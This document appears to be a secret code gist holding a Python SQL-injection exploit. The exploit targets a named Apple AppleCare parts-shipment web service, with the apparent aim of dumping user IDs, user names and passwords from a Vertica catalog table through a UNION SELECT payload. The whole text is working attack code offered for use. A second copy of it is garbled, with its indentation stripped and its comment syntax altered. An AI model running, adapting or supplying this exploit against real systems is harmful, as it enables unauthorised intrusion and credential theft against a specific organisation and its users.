ziot/vsqli.py Secret

## vsqli.py
import requests, json

def doInject(injectionQuery):
    url = "https://gbiportal-apps-external.apple.com/gsf/partShipment/businessareas/AppleCare/subjectareas/acservice/services/batch"
    r = requests.post(url, headers = {
        "content-type": "application/json",
        "X-Requested-With": "XMLHttpRequest",
        "CSRF": "",
        "Origin": "https://gbiportal-apps-external-msc.apple.com",
        "Cookie": ""
    }, json = {
        "executionType": "parallel",
        "requests": [{
            "queryName": "query_for_table_filter",
            "filters": {
                "D_sold_to_cust_Id": [injectionQuery],
                "D_ship_to_cust_Id": [""],
                "D_ORDER_SHIP_DATE": [""],
                "D_Repair_Type_Cd": [""],
                "D_Order_ID": [""],
                "D_Dispatch_Id": [""],
                "orderBy": ["service_notification_number"],
                "orderType": ["desc"],
                "limit": ["*/*/ limit 5000"],
                "offset": ["0"]
            }
        }]
    })

    try:
        for result in json.loads(r.text)["result"][0]["query_for_table_filter"]:
            data = result["service_notification_number"].rstrip()
            print " ".join(data.split("$$$")).encode("utf8")
    except:
        print 'failed'


def getData(columns, table, schema=""):

    columnStr = ""

    for column in columns:
        if columnStr == "":
            columnStr+="{}".format(column)
        else:
            columnStr+="||'$$$'||{}".format(column)

    if schema:
        fromStr = "{}.{}".format(schema,table)
    else:
        fromStr = table

    query = "-1' UNION all SELECT {},null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM/**/{} /*".format(columnStr, fromStr)

    doInject(query)

getData(["user_id","user_name","password"],"passwords","v_catalog")
	import requests, json

	def doInject(injectionQuery):
	url = "https://gbiportal-apps-external.apple.com/gsf/partShipment/businessareas/AppleCare/subjectareas/acservice/services/batch"
	r = requests.post(url, headers = {
	"content-type": "application/json",
	"X-Requested-With": "XMLHttpRequest",
	"CSRF": "",
	"Origin": "https://gbiportal-apps-external-msc.apple.com",
	"Cookie": ""
	}, json = {
	"executionType": "parallel",
	"requests": [{
	"queryName": "query_for_table_filter",
	"filters": {
	"D_sold_to_cust_Id": [injectionQuery],
	"D_ship_to_cust_Id": [""],
	"D_ORDER_SHIP_DATE": [""],
	"D_Repair_Type_Cd": [""],
	"D_Order_ID": [""],
	"D_Dispatch_Id": [""],
	"orderBy": ["service_notification_number"],
	"orderType": ["desc"],
	"limit": ["// limit 5000"],
	"offset": ["0"]
	}
	}]
	})

	try:
	for result in json.loads(r.text)["result"][0]["query_for_table_filter"]:
	data = result["service_notification_number"].rstrip()
	print " ".join(data.split("$$$")).encode("utf8")
	except:
	print 'failed'


	def getData(columns, table, schema=""):

	columnStr = ""

	for column in columns:
	if columnStr == "":
	columnStr+="{}".format(column)
	else:
	columnStr+="\|\|'$$$'\|\|{}".format(column)

	if schema:
	fromStr = "{}.{}".format(schema,table)
	else:
	fromStr = table

	query = "-1' UNION all SELECT {},null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM/*/{} /".format(columnStr, fromStr)

	doInject(query)

	getData(["user_id","user_name","password"],"passwords","v_catalog")